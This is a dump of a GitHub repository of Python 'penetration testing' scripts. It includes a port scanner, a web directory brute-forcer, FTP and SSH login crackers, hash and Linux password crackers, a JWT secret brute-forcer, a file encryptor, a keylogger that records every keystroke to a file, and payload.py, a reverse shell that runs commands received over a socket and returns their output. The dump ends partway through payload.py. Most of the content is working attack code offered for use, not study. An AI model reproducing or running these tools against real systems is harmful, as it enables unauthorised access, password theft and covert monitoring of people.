├── .github └── ISSUE_TEMPLATE │ └── feature_request.md ├── LICENSE ├── PortScan.py ├── README.md ├── SimpleHTTPServer.py ├── StatusCode.py ├── crypto.py ├── dirbrute.py ├── ftp_cracker.py ├── hash_cracker.py ├── hashing.py ├── jwt-secret-bruteforce.py ├── keylogger.py ├── linuxcracker.py ├── payload.py ├── scopes.py ├── screentaker.py ├── ssh_crack.py ├── subchecker.py ├── waybackmachine.py └── webtech.py /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. 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But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /PortScan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from concurrent.futures import ThreadPoolExecutor as executor 4 | import socket 5 | import time 6 | import sys 7 | import argparse 8 | 9 | green = "\033[32m" 10 | bold = "\033[1m" 11 | blue = "\033[94m" 12 | red = "\033[91m" 13 | end = "\033[0m" 14 | 15 | start = time.time() 16 | 17 | print(blue+""" 18 | ____ _ ____ 19 | | _ \ ___ _ __| |_/ ___| ___ __ _ _ __ 20 | | |_) / _ \| '__| __\___ \ / __/ _` | '_ \ 21 | | __/ (_) | | | |_ ___) | (_| (_| | | | | 22 | |_| \___/|_| \__|____/ \___\__,_|_| |_| 23 | By: @bing0o 24 | """+end) 25 | 26 | 27 | def printer(shit): 28 | sys.stdout.write(shit+" \r") 29 | sys.stdout.flush() 30 | return True 31 | 32 | 33 | def scan(ip,port,l): 34 | printer("Testing Port: "+str(port)) 35 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | space = 10 - l 37 | space = " " * space 38 | if s.connect_ex((ip,port)): 39 | return None 40 | else : 41 | try: 42 | service = socket.getservbyport(port) 43 | print(str(port) + "/TCP" + space + service) 44 | except socket.error: 45 | print(str(port) + "/TCP" + space + "Unknown") 46 | 47 | except KeyboardInterrupt: 48 | print(red+"[-] Exiting!"+end) 49 | exit(1) 50 | 51 | return True 52 | 53 | 54 | 55 | 56 | def main(): 57 | parser = argparse.ArgumentParser() 58 | parser.add_argument("-t", "--target", help="Target IP/Host", type=str) 59 | parser.add_argument("-d", "--thread", help="threads number (Default 5)", type=int) 60 | parser.add_argument("-p", "--port", help="Ports range (Example: -p 20-1024)", type=str) 61 | args = parser.parse_args() 62 | 63 | target = str(args.target) 64 | thread = args.thread 65 | ports = str(args.port) 66 | 67 | if target == "None": 68 | parser.print_help() 69 | exit(1) 70 | if thread == None: 71 | thread = 5 72 | 73 | if ports == "None": 74 | ports = range(65535) 75 | p = "1-65535" 76 | else: 77 | try: 78 | p = ports 79 | ports = ports.split("-") 80 | ports = range(int(ports[0]), int(ports[1])) 81 | except IndexError: 82 | print("-p/--port, should be a range of ports, Example: -p 20-1024") 83 | exit(1) 84 | 85 | print(green+"[+] Target: "+end+target) 86 | print(green+"[+] Threads: "+end+str(thread)) 87 | print(green+"[+] Ports: "+end+p) 88 | print(bold+"\n[+] Start The Scan\n"+end) 89 | print("PORT SERVICE") 90 | print("---- -------") 91 | 92 | with executor(max_workers=int(thread)) as exe: 93 | try: 94 | [exe.submit(scan, target, port, len(str(port))) for port in ports] 95 | except KeyboardInterrupt: 96 | print(red+"[-] Exiting!"+end) 97 | exit(1) 98 | 99 | 100 | 101 | took = time.time() - start 102 | t = str(took).split('.')[0] 103 | m = int(t) / 60 104 | s = int(t) % 60 105 | 106 | print(" \r") 107 | print(blue+"[+] Took: "+end+str(m)+":"+str(s)) 108 | 109 | 110 | if __name__ == '__main__': 111 | main() 112 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [![forthebadge made-with-python](http://ForTheBadge.com/images/badges/made-with-python.svg)](https://www.python.org/) 2 | ## :information_source:  what is this ?! 3 | a Collection of simple python scripts, for penetration testing & automation, it's like I just save my scripts here and not all of them are useful. ^^ 4 | ## :notebook_with_decorative_cover:  Description: 5 | :black_small_square: short description for each script. 6 | 7 | - [SimpleHTTPServer.py](SimpleHTTPServer.py): simple http server running on port 4444, simply u can change it :)
8 | - [crypto.py](crypto.py): Encrypt/Decrypt your files with password to save your privacy.
9 | - [dirbrute.py](dirbrute.py): search for files and directories on websites.
10 | - [ftp_cracker.py](ftp_cracker.py): ftp bruteforce attack to get login informations.
11 | - [hash_cracker.py](hash_cracker.py): simple tool to crack hash, md5, sha1, sha-256, sha-512 ...etc.
12 | - [hashing.py](hashing.py): gets you the file or word's hash.
13 | - [keylogger.py](keylogger.py): keylogger to save every word typed on the keyboard.
14 | - [linuxcracker.py](linuxcracker.py): Linux Password Cracker - Dictionary Attack.
15 | - [payload.py](payload.py): simple reverse connection script, gets you shell command on the target system.
16 | - [PortScan.py](PortScan.py): simple port scanner.
17 | - [ssh_crack.py](ssh_crack.py): script for ssh bruteforce attack.
18 | - [subchecker.py](subchecker.py): Useful tools especially for penetration testers and bug hunters to check for subdomains (or list of domains generally) from a file, and get the up domains from it
19 | - [webtech.py](webtech.py): Web Technologies Detector, useful for developers, penetration testers and bug hunters.
20 | - [waybackmachine.py](waybackmachine.py): this script uses wayback machine to collect a bunch of URLs and PATHs for a specific domain.
21 | 22 | I hope this collection will be useful!. 23 | 24 | *Happy Hacking* 25 | 26 | ## Support 27 | you can support me here: https://www.buymeacoffee.com/bing0o 28 | -------------------------------------------------------------------------------- /SimpleHTTPServer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import http.server 4 | import socketserver 5 | 6 | print """ 7 | *--------------------------------------* 8 | | programmed by : mohamed | 9 | | fb.me/hack1lab | 10 | *--------------------------------------* 11 | _ _ _ _ 12 | | |__ __ _ ___| | _| | __ _| |__ 13 | | '_ \ / _` |/ __| |/ / |/ _` | '_ \ 14 | | | | | (_| | (__| <| | (_| | |_) | 15 | |_| |_|\__,_|\___|_|\_\_|\__,_|_.__/ 16 | 17 | SimpleHTTPServer 18 | ---------------- 19 | 20 | """ 21 | 22 | port = 4444 23 | 24 | server = http.server.SimpleHTTPRequestHandler 25 | request = socketserver.TCPServer(("",port),server) 26 | print("server is up ....",port) 27 | request.serve_forever() -------------------------------------------------------------------------------- /StatusCode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from concurrent.futures import ThreadPoolExecutor as executor # sudo pip install future 4 | import argparse, requests, sys 5 | 6 | yellow = "\033[93m" 7 | green = "\033[92m" 8 | blue = "\033[94m" 9 | red = "\033[91m" 10 | bold = "\033[1m" 11 | end = "\033[0m" 12 | 13 | 14 | def printer(url): 15 | sys.stdout.write(url+" \r") 16 | sys.stdout.flush() 17 | return True 18 | 19 | def check(out, url): 20 | #print("hell") 21 | printer("Testing: " + url) 22 | link = 'http://' + url 23 | try: 24 | req = requests.head(link, timeout=10) 25 | length = str(req.headers['Content-Length']) 26 | scode = str(req.status_code) 27 | if scode.startswith("2"): 28 | print(blue+"["+bold+green+str(scode)+end+blue+"]"+end+" | "+str(url)+length) 29 | elif scode.startswith("3"): 30 | if req.headers['Location'].startswith("https://"+url): 31 | print(blue+"["+bold+yellow+str(scode)+end+blue+"]"+end+" | "+str(url)+" - HTTPS | "+length) 32 | else: 33 | print(blue+"["+bold+yellow+str(scode)+end+blue+"]"+end+" | "+str(url)+" | "+req.headers['Location']+" | "+length) 34 | elif scode.startswith("4"): 35 | print(blue+"["+bold+red+str(scode)+end+blue+"]"+end+" | "+str(url)+" | "+length) 36 | else: 37 | print(blue+"["+end+str(scode)+blue+"]"+end+" | "+str(url)+" | "+length) 38 | 39 | if out != 'None': 40 | with open(out, 'a') as f: 41 | f.write(str(scode)+" | "+url+" | "+length+"\n") 42 | f.close() 43 | 44 | return True 45 | 46 | except Exception: 47 | return False 48 | 49 | 50 | def main(): 51 | parser = argparse.ArgumentParser() 52 | parser.add_argument("-w", "--wordlist", help="Domains List File", type=str, required=True) 53 | parser.add_argument("-t", "--thread", help="Theads Number - (Default: 10)", type=int) 54 | parser.add_argument("-o", "--output", help="Save Results In a File", type=str) #action='store_true' 55 | 56 | args = parser.parse_args() 57 | 58 | wlist = str(args.wordlist) 59 | threads = str(args.thread) 60 | out = str(args.output) 61 | 62 | if threads == 'None': 63 | threads = 10 64 | else: 65 | threads = threads 66 | 67 | lines = len(open(wlist).readlines()) 68 | print(blue +"["+red+"+"+blue+"] File: " + end + wlist) 69 | print(blue +"["+red+"+"+blue+"] Length: " + end + str(lines)) 70 | print(blue +"["+red+"+"+blue+"] Threads: " + end + str(threads)) 71 | print(blue +"["+red+"+"+blue+"] Output: " + end + str(out)) 72 | print(red+bold+"\n[+] Results:\n"+end) 73 | 74 | urls = open(wlist, 'r') 75 | 76 | with executor(max_workers=int(threads)) as exe: 77 | [exe.submit(check, out, url.strip('\n')) for url in urls] 78 | 79 | if __name__=='__main__': 80 | main() 81 | -------------------------------------------------------------------------------- /crypto.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import os, argparse 4 | from getpass import getpass 5 | # sudo pip3 install pycryptodome // 3.21.0 6 | from Crypto.Cipher import AES 7 | from Crypto.Hash import SHA256 8 | from Crypto import Random 9 | 10 | 11 | green = "\033[32m" 12 | blue = "\033[34m" 13 | red = "\033[31m" 14 | bold = "\033[1m" 15 | end = "\033[0m" 16 | 17 | print(red+""" 18 | | 19 | | 20 | ----+---- --------- 21 | | 22 | | 23 | ) ( 24 | \ \ / / 25 | \ |\ / |/ 26 | \| \ hack1lab / / 27 | \ |\ -------- / | / 28 | \ | \_______________________/ | / 29 | \ | | | | | |/ 30 | \| | | | | / 31 | \____|______|______|______|___/ 32 | 33 | Files Encryption 34 | fb.me/hack1lab, @hack1lab 35 | """+end) 36 | 37 | def encrypt(key, filename, ig): 38 | chunksize = 64*1024 39 | outputFile = filename+".hacklab" 40 | size = os.path.getsize(filename) #+ 16 41 | filesize = str(size).zfill(16) 42 | IV = Random.new().read(16) 43 | secret = "0000hack1lab0000".encode("utf-8") 44 | 45 | encryptor = AES.new(key, AES.MODE_CBC, IV) 46 | 47 | with open(filename, 'rb') as infile: 48 | with open(outputFile, 'wb') as outfile: 49 | outfile.write(filesize.encode('utf-8')) 50 | outfile.write(IV) 51 | if ig != 'True': 52 | outfile.write(encryptor.encrypt(secret)) 53 | 54 | while True: 55 | chunk = infile.read(chunksize) 56 | 57 | if len(chunk) == 0: 58 | break 59 | elif len(chunk) % 16 != 0: 60 | chunk += b' ' * (16 - (len(chunk) % 16)) 61 | 62 | outfile.write(encryptor.encrypt(chunk)) 63 | 64 | 65 | def decrypt(key, filename): 66 | chunksize = 64 * 1024 67 | outputFile = filename.split('.hacklab')[0] 68 | 69 | 70 | with open(filename, 'rb') as infile: 71 | filesize = int(infile.read(16)) 72 | IV = infile.read(16) 73 | decryptor = AES.new(key, AES.MODE_CBC, IV) 74 | 75 | with open(outputFile, 'wb') as outfile: 76 | 77 | while True: 78 | chunk = infile.read(chunksize) 79 | 80 | if len(chunk) == 0: 81 | break 82 | 83 | #chunk = str(decryptor.decrypt(chunk)) 84 | chunk = decryptor.decrypt(chunk) 85 | chunk = chunk.replace("0000hack1lab0000".encode("utf-8"), "".encode("utf-8")) 86 | outfile.write(chunk) 87 | outfile.truncate(filesize) 88 | 89 | 90 | def check(key, filename): 91 | chunksize = 64# * 1024 92 | secret = "0000hack1lab0000".encode("utf-8") 93 | 94 | with open(filename, 'rb') as infile: 95 | IV = infile.read(16) 96 | decryptor = AES.new(key, AES.MODE_CBC, IV) 97 | 98 | chunk = infile.read(chunksize) 99 | test = decryptor.decrypt(chunk) 100 | if secret not in test: 101 | exit(red+bold+"[!] Wrong Password!"+end) 102 | 103 | 104 | 105 | 106 | def getkey(password): 107 | hasher = SHA256.new(password.encode('utf-8')) 108 | return hasher.digest() 109 | 110 | def main(): 111 | parser = argparse.ArgumentParser() 112 | parser.add_argument("-e", "--crypt", help="File Encryption", type=str) 113 | parser.add_argument("-d", "--dcrypt", help="File Decryption", type=str) 114 | parser.add_argument("-p", "--password", help="Password To Encrypt/Decrypt a File", type=str) 115 | parser.add_argument("-x", "--delete", help="Delete The Original File", action='store_true') 116 | parser.add_argument("-i", "--ignore", help="Ignore The Check For The Password.", action='store_true') 117 | args = parser.parse_args() 118 | 119 | enc = str(args.crypt) 120 | dec = str(args.dcrypt) 121 | password = str(args.password) 122 | dd = str(args.delete) 123 | ig = str(args.ignore) 124 | 125 | if enc == "None" and dec == "None": 126 | parser.print_help() 127 | exit(1) 128 | 129 | if password == "None": 130 | password = getpass() 131 | 132 | if enc != "None": 133 | print(blue+"[+] Encrypt: "+end+"[ "+enc+" ]") 134 | encrypt(getkey(password), enc, ig) 135 | print(blue+"[+] Output: "+end+"[ "+enc+".hacklab"+" ]") 136 | if dd == "True": 137 | print(red+"[!] Remove: "+end+"[ "+enc+" ]") 138 | os.remove(enc) 139 | print(green+bold+"[*] Done!"+end) 140 | 141 | elif dec != "None": 142 | print(blue+"[+] Decrypt: "+end+"[ "+dec+" ]") 143 | if ig != 'True': 144 | check(getkey(password), dec) 145 | decrypt(getkey(password), dec) 146 | name = dec.split(".hacklab")[0] 147 | print(blue+"[+] Output: "+end+"[ "+name+" ]") 148 | if dd == "True": 149 | print(red+"[!] Remove: "+end+"[ "+dec+" ]") 150 | os.remove(dec) 151 | print(green+bold+"[*] Done!"+end) 152 | 153 | 154 | 155 | if __name__ == '__main__': 156 | main() 157 | -------------------------------------------------------------------------------- /dirbrute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # 4 | # dirbrute.py 5 | # 6 | # Copyright 2019 bingo 7 | # 8 | # This program is free software; you can redistribute it and/or modify 9 | # it under the terms of the GNU General Public License as published by 10 | # the Free Software Foundation; either version 2 of the License, or 11 | # (at your option) any later version. 12 | # 13 | # This program is distributed in the hope that it will be useful, 14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 16 | # GNU General Public License for more details. 17 | # 18 | # 19 | 20 | yellow = "\033[93m" 21 | green = "\033[92m" 22 | blue = "\033[94m" 23 | red = "\033[91m" 24 | bold = "\033[1m" 25 | end = "\033[0m" 26 | 27 | 28 | print(blue+bold+""" 29 | 30 | \t _ _ _ _ 31 | \t __| (_)_ __| |__ _ __ _ _| |_ ___ 32 | \t / _` | | '__| '_ \| '__| | | | __/ _ \\ 33 | \t| (_| | | | | |_) | | | |_| | || __/ 34 | \t \__,_|_|_| |_.__/|_| \__,_|\__\___|"""+bold+"V: 1.6"+ end +blue+""" 35 | \t 36 | \t Coded by: Bingo 37 | \t --------------- 38 | """+end) 39 | 40 | 41 | from concurrent.futures import ThreadPoolExecutor as executor 42 | import sys, time, requests 43 | from optparse import * 44 | 45 | start = time.time() 46 | 47 | def printer(word): 48 | sys.stdout.write(word + " \r") 49 | sys.stdout.flush() 50 | return True 51 | 52 | 53 | def presearch(domain, ext, url): 54 | if ext == 'Null' or ext == 'None': 55 | checkstatus(domain, url) 56 | elif url == "" or url == " ": 57 | pass 58 | else: 59 | ext = list(ext) 60 | ext.append("") 61 | for i in ext: 62 | if i == "" or i == "None": 63 | link = url 64 | else: 65 | link = url + "." + str(i) 66 | 67 | checkstatus(domain, link) 68 | 69 | 70 | def checkstatus(domain, url): 71 | if url == "" or url == " ": 72 | pass 73 | elif url.startswith("#"): 74 | pass 75 | elif len(url) > 30: 76 | pass 77 | 78 | else: 79 | printer("Testing: " + domain + url) 80 | #time.sleep(1) 81 | try: 82 | link = domain + url 83 | req = requests.head(link) 84 | st = str(req.status_code) 85 | if st.startswith("2"): 86 | print(green + "[+] "+st+" | Found: " + end + "[ " + url + " ]" + " \r") 87 | elif st.startswith("3"): 88 | link = req.headers['Location'] 89 | #link = req.url 90 | print(yellow + "[*] "+st+" | Redirection From: " + end + "[ " + url + " ]" + yellow + " -> " + end + "[ " + link + " ]" + " \r") 91 | 92 | elif st.startswith("1"): 93 | print(green + "[+] "+st+" | Found: " + end + "[ " + url + " ]" + " \r") 94 | elif st.startswith("4"): 95 | if st != '404': 96 | print(blue+"[!] "+st+" | Found: " + end + "[ " + url + " ]" + " \r") 97 | 98 | #writer(link,'up') 99 | 100 | return True 101 | 102 | except Exception: 103 | #writer(url,'down') 104 | return False 105 | 106 | 107 | parser = OptionParser(green+""" 108 | 109 | #Usage:"""+yellow+""" 110 | -t target host 111 | -w wordlist 112 | -d thread number (Optional, Default: 10) 113 | -e extensions (Optional, ex: html,php) 114 | """+green+""" 115 | #Example:"""+yellow+""" 116 | python3 dirbrute.py -t domain.com -w dirlist.txt -d 20 -e php,html 117 | 118 | """+end) 119 | 120 | def Main(): 121 | try: 122 | parser.add_option("-t", dest="target", type="string", help="the target domain") 123 | parser.add_option("-w", dest="wordlist", type="string", help="wordlist file") 124 | parser.add_option("-d", dest="thread", type="int", help="the thread number") 125 | parser.add_option("-e", dest="extension", type="string", help="the extendions") 126 | (options, args) = parser.parse_args() 127 | if options.target == None or options.wordlist == None: 128 | print(parser.usage) 129 | exit(1) 130 | else: 131 | target = str(options.target) 132 | wordlist = str(options.wordlist) 133 | thread = str(options.thread) 134 | ext = str(options.extension) 135 | 136 | if thread == "None": 137 | thread = 10 138 | else: 139 | thread = thread 140 | 141 | if target.startswith("http"): 142 | target = target 143 | else: 144 | target = "http://" + target 145 | 146 | if target.endswith("/"): 147 | target = target 148 | else: 149 | target = target + "/" 150 | 151 | lines = len(open(wordlist).readlines()) 152 | 153 | print("["+ yellow + bold +"Info"+ end +"]:\n") 154 | print(blue + "["+red+"+"+blue+"] Target: " + end + target) 155 | print(blue +"["+red+"+"+blue+"] File: " + end + wordlist) 156 | print(blue +"["+red+"+"+blue+"] Length: " + end + str(lines)) 157 | print(blue +"["+red+"+"+blue+"] Thread: " + end + str(thread)) 158 | print(blue +"["+red+"+"+blue+"] Extension: " + end + str(ext)) 159 | print("\n["+ yellow + bold +"Start Searching"+ end +"]:\n") 160 | 161 | if ext == "None": 162 | ext = "Null" 163 | else: 164 | ext = ext.split(",") 165 | 166 | urls = open(wordlist, 'r') 167 | with executor(max_workers=int(thread)) as exe: 168 | jobs = [exe.submit(presearch, target, ext, url.strip('\n')) for url in urls] 169 | 170 | took = time.time() - start 171 | took = took / 60 172 | took = round(took,2) 173 | 174 | print(red + "Took: " + end + str(took) + " m" + " \r") 175 | 176 | print("\n\t* Happy Hacking *") 177 | except Exception as e: 178 | print(red + "#Error: " + end + str(e)) 179 | exit(1) 180 | 181 | if __name__ == '__main__': 182 | Main() 183 | -------------------------------------------------------------------------------- /ftp_cracker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import ftplib 4 | from optparse import * 5 | 6 | 7 | class colors: 8 | def __init__(self): 9 | self.blue = "\033[94m" 10 | self.red = "\033[91m" 11 | self.end = "\033[0m" 12 | cl = colors() 13 | 14 | print(cl.blue+""" 15 | *--------------------------------------* 16 | | programmed by : mohamed | 17 | | fb.me/hack1lab | 18 | *--------------------------------------* 19 | _ _ _ _ 20 | | |__ __ _ ___| | _| | __ _| |__ 21 | | '_ \ / _` |/ __| |/ / |/ _` | '_ \ 22 | | | | | (_| | (__| <| | (_| | |_) | 23 | |_| |_|\__,_|\___|_|\_\_|\__,_|_.__/ 24 | 25 | ftp cracker 26 | ------------- 27 | 28 | """+cl.end) 29 | 30 | def connect(host, user, password): 31 | try: 32 | ftp = ftplib.FTP(host) 33 | ftp.login(user, password) 34 | print(cl.red+"\nLogin successfuly with password: "+str(password)+cl.end+'\n') 35 | ftp.quit() 36 | exit(0) 37 | except Exception: 38 | return False 39 | 40 | parser = OptionParser(""" 41 | 42 | #Usage: 43 | 44 | python ftp_cracker.py -t -u -p 45 | 46 | #Example: 47 | 48 | python ftp_cracker.py -t 127.0.0.1 -u hacklab -p wordlist.txt 49 | 50 | """) 51 | 52 | 53 | try: 54 | parser.add_option("-t",dest="target",type="string", help="enter target ip") 55 | parser.add_option("-u",dest="user",type="string", help="enter target user") 56 | parser.add_option("-p",dest="password",type="string", help="enter passwords file") 57 | (options, args) = parser.parse_args() 58 | if options.target == None or options.user == None or options.password == None: 59 | print(cl.blue+parser.usage+cl.end) 60 | exit(0) 61 | else: 62 | host = str(options.target) 63 | user = str(options.user) 64 | password = str(options.password) 65 | 66 | read = open(password, 'r') 67 | for word in read: 68 | word = word.strip('\n') 69 | print("Testing: "+str(word)) 70 | connect(host, user, word) 71 | except Exception: 72 | print("there error !!") -------------------------------------------------------------------------------- /hash_cracker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | print """ 4 | *--------------------------------------* 5 | | Coded by : mohamed | 6 | | fb.me/hack1lab | 7 | *--------------------------------------* 8 | _ _ _ _ 9 | | |__ __ _ ___| | _| | __ _| |__ 10 | | '_ \ / _` |/ __| |/ / |/ _` | '_ \ 11 | | | | | (_| | (__| <| | (_| | |_) | 12 | |_| |_|\__,_|\___|_|\_\_|\__,_|_.__/ 13 | 14 | python hacking 15 | -------------- 16 | """ 17 | import hashlib 18 | from optparse import * 19 | 20 | def hashing(word, algorithm): 21 | """ algorithms available: ['md4', 'md5', 'sha1', 'sha256' .... etc] """ 22 | hash_type = hashlib.new(algorithm) 23 | hash_type.update(word) 24 | return hash_type.hexdigest() 25 | 26 | 27 | parser = OptionParser(""" 28 | 29 | #Usage: 30 | 31 | python cracker.py -w -t -f 32 | 33 | #Example: 34 | 35 | python cracker.py -w 7052cad6b415f4272c1986aa9a50a7c3 -t md5 -f wordlist.txt 36 | """) 37 | parser.add_option("-w",dest="ha_sh",type="string",help="enter hash string") 38 | parser.add_option("-t",dest="ty_pe",type="string",help="enter type the hash") 39 | parser.add_option("-f",dest="fi_le",type="string",help="enter file word list") 40 | (options,args) = parser.parse_args() 41 | if options.ha_sh == None or options.ty_pe == None or options.fi_le == None: 42 | print(parser.usage) 43 | exit(0) 44 | else: 45 | ha_sh = str(options.ha_sh) 46 | ty_pe = str(options.ty_pe) 47 | fi_le = str(options.fi_le) 48 | 49 | read_list = open(fi_le,'r') 50 | for word in read_list: 51 | word = word.strip("\n") 52 | result = hashing(word, ty_pe) 53 | print("Testing: "+word) 54 | if ha_sh == result: 55 | print ("\nHash Found: [ {} ] >> word: [ {} ]".format(result,word)) 56 | exit(0) 57 | else: 58 | continue 59 | 60 | print("\n\thash not found :(\n") 61 | -------------------------------------------------------------------------------- /hashing.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import hashlib 4 | from optparse import * 5 | 6 | 7 | class colors: 8 | def __init__(self): 9 | self.blue = "\033[94m" 10 | self.red = "\033[91m" 11 | self.end = "\033[0m" 12 | cl = colors() 13 | 14 | print(cl.blue+""" 15 | 16 | *--------------------------------------* 17 | | programmed by : mohamed | 18 | | fb.me/hack1lab | 19 | *--------------------------------------* 20 | _ _ _ _ 21 | | |__ __ _ ___| | _| | __ _| |__ 22 | | '_ \ / _` |/ __| |/ / |/ _` | '_ \ 23 | | | | | (_| | (__| <| | (_| | |_) | 24 | |_| |_|\__,_|\___|_|\_\_|\__,_|_.__/ 25 | 26 | hashing 27 | --------- 28 | 29 | """+cl.end) 30 | 31 | def hashing(data, type_h): 32 | hash_type = hashlib.new(type_h) 33 | hash_type.update(data) 34 | return hash_type.hexdigest() 35 | 36 | parser = OptionParser(""" 37 | 38 | -------------------------[Usage]------------------------ 39 | 40 | #Options: 41 | 42 | -x hashing text 43 | -f hashing file any file e.g (.txt, .rar, .zip, .iso, .exe, .py, ........ etc) 44 | -t the Hashing type e.g (md5, md4, sha1, sha256, sha512, ....... etc) 45 | 46 | #Example: 47 | 48 | python hashing.py -x hacklab -t md5 49 | 50 | python hashing.py -f kali_linux.iso -t sha1 51 | 52 | """) 53 | try: 54 | parser.add_option("-x",dest="Text",type="string", help="enter text for hashing") 55 | parser.add_option("-f",dest="File",type="string", help="enter file for hahsing") 56 | parser.add_option("-t",dest="Type",type="string", help="Enter the Hashing type") 57 | (options, args) = parser.parse_args() 58 | if options.Text == None and options.File == None: 59 | print(cl.blue+parser.usage+cl.end) 60 | exit(0) 61 | else: 62 | Text = str(options.Text) 63 | File = str(options.File) 64 | Type = str(options.Type) 65 | if options.Text == None: 66 | read_file = open(File, 'r') 67 | File = str(read_file.read()) 68 | result = hashing(File, Type) 69 | print(cl.red+"[+] Hash File: [ "+result+' ]'+cl.end+'\n') 70 | elif options.File == None: 71 | result = hashing(Text,Type) 72 | print(cl.red+"[+] Hash Text: [ "+result+' ]'+cl.end+'\n') 73 | else: 74 | print(cl.blue+"[-] there error !!"+cl.end) 75 | except Exception, e: 76 | print("Error: "+ str(e)) 77 | -------------------------------------------------------------------------------- /jwt-secret-bruteforce.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Python Script to bruteforce for Json Web Token Secret. 4 | # 5 | 6 | from concurrent.futures import ThreadPoolExecutor as executor 7 | import argparse 8 | import jwt, sys 9 | 10 | def crack(token, algo, secret): 11 | options = { 'verify_exp':False} 12 | try: 13 | payload = jwt.decode(token, secret, algorithm=algo, options=options) 14 | print("The Secret Key: "+secret) 15 | print("Payload: "+str(payload)) 16 | except Exception: 17 | return False 18 | 19 | 20 | parser = argparse.ArgumentParser() 21 | 22 | parser.add_argument("-t", dest="token", type=str, help="Json Web Token.", required=True) 23 | parser.add_argument("-w", dest="wordlist", type=str, help="Wordlist Of Secrets.", required=True) 24 | parser.add_argument("-c", dest="threads", type=int, help="Threds Number (Default: 10).") 25 | parser.add_argument("-a", dest="algo", type=str, help="The Algorithm (Default: HS256).") 26 | args = parser.parse_args() 27 | token = str(args.token) 28 | wlist = str(args.wordlist) 29 | threads = args.threads 30 | algo = str(args.algo) 31 | if threads == None: 32 | threads = 10 33 | if algo == None: 34 | algo = 'HS256' 35 | 36 | secrets = open(wlist, 'r') 37 | with executor(max_workers=int(threads)) as exe: 38 | [exe.submit(crack, token, algo, secret.strip('\n')) for secret in secrets] 39 | 40 | 41 | print("* Done! *") 42 | -------------------------------------------------------------------------------- /keylogger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import pyxhook 4 | 5 | """ 6 | *--------------------------------------* 7 | | programmed by : mohamed | 8 | | fb.me/hack1lab | 9 | *--------------------------------------* 10 | _ _ _ _ 11 | | |__ __ _ ___| | _| | __ _| |__ 12 | | '_ \ / _` |/ __| |/ / |/ _` | '_ \ 13 | | | | | (_| | (__| <| | (_| | |_) | 14 | |_| |_|\__,_|\___|_|\_\_|\__,_|_.__/ 15 | 16 | Keylogger 17 | ----------- 18 | """ 19 | 20 | 21 | 22 | log_file='/home/pen-test/txt_files/file.log' 23 | 24 | def keypress(event): 25 | log=open(log_file,'a') 26 | if event.Key == 'space': 27 | log.write(' ') 28 | elif event.Key == 'Return': 29 | log.write('\n') 30 | elif len(event.Key) != 1: 31 | log.write('[ '+event.Key+' ]') 32 | else: 33 | log.write(event.Key) 34 | 35 | key=pyxhook.HookManager() 36 | key.KeyDown=keypress 37 | key.HookKeyboard() 38 | key.start() 39 | -------------------------------------------------------------------------------- /linuxcracker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import crypt, sys 4 | 5 | 6 | def printer(thing): 7 | sys.stdout.write(thing+" \r") 8 | sys.stdout.flush() 9 | return True 10 | 11 | 12 | def cracker(passcrypt, dicfile): 13 | count=1 14 | lines = len(open(dicfile).readlines()) 15 | dicfile = open(dicfile, 'r') 16 | for word in dicfile: 17 | printer("["+str(count)+"/"+str(lines)+"]") 18 | count+=1 19 | password = word.strip('\n') 20 | cryptword = crypt.crypt(password, passcrypt) 21 | if cryptword == passcrypt: 22 | print("\n[+]Password Found: "+word) 23 | return True 24 | 25 | print("[-]Not Found!") 26 | 27 | try: 28 | filepass = sys.argv[1] 29 | dictfile = sys.argv[2] 30 | except: 31 | print('#Usage:\n\tpython linuxcracker.py passfile.txt dictfile.txt') 32 | exit(0) 33 | 34 | readpass = open(filepass, 'r') 35 | 36 | for line in readpass: 37 | user = line.split(':')[0] 38 | cryptpass = line.split(':')[1].strip(' ') 39 | print("[*] Cracking | User: "+user) 40 | cracker(cryptpass, dictfile) 41 | 42 | -------------------------------------------------------------------------------- /payload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | *--------------------------------------* 5 | | programmed by : mohamed | 6 | | fb.me/hack1lab | 7 | *--------------------------------------* 8 | _ _ _ _ 9 | | |__ __ _ ___| | _| | __ _| |__ 10 | | '_ \ / _` |/ __| |/ / |/ _` | '_ \ 11 | | | | | (_| | (__| <| | (_| | |_) | 12 | |_| |_|\__,_|\___|_|\_\_|\__,_|_.__/ 13 | 14 | Happy Hacking 15 | ---------------- 16 | """ 17 | import socket 18 | import os 19 | 20 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) 22 | s.setblocking(1) 23 | 24 | ip = "127.0.0.1" 25 | port = 4444 26 | 27 | s.connect((ip,port)) 28 | 29 | s.send(b'Happy Hacking ^_^\n') 30 | while True: 31 | try: 32 | command = s.recv(1024).decode('utf-8') 33 | command = str(command) 34 | if "cd" in command: 35 | command = command.replace("\n","") 36 | command = os.chdir(command.split('cd ')[1]) 37 | com = os.popen("ls") 38 | result = str(com.read()).encode('utf-8') 39 | s.send(result) 40 | else: 41 | treating = os.popen(command) 42 | results = str(treating.read()) 43 | results = results.encode('utf-8') 44 | s.send(results) 45 | except 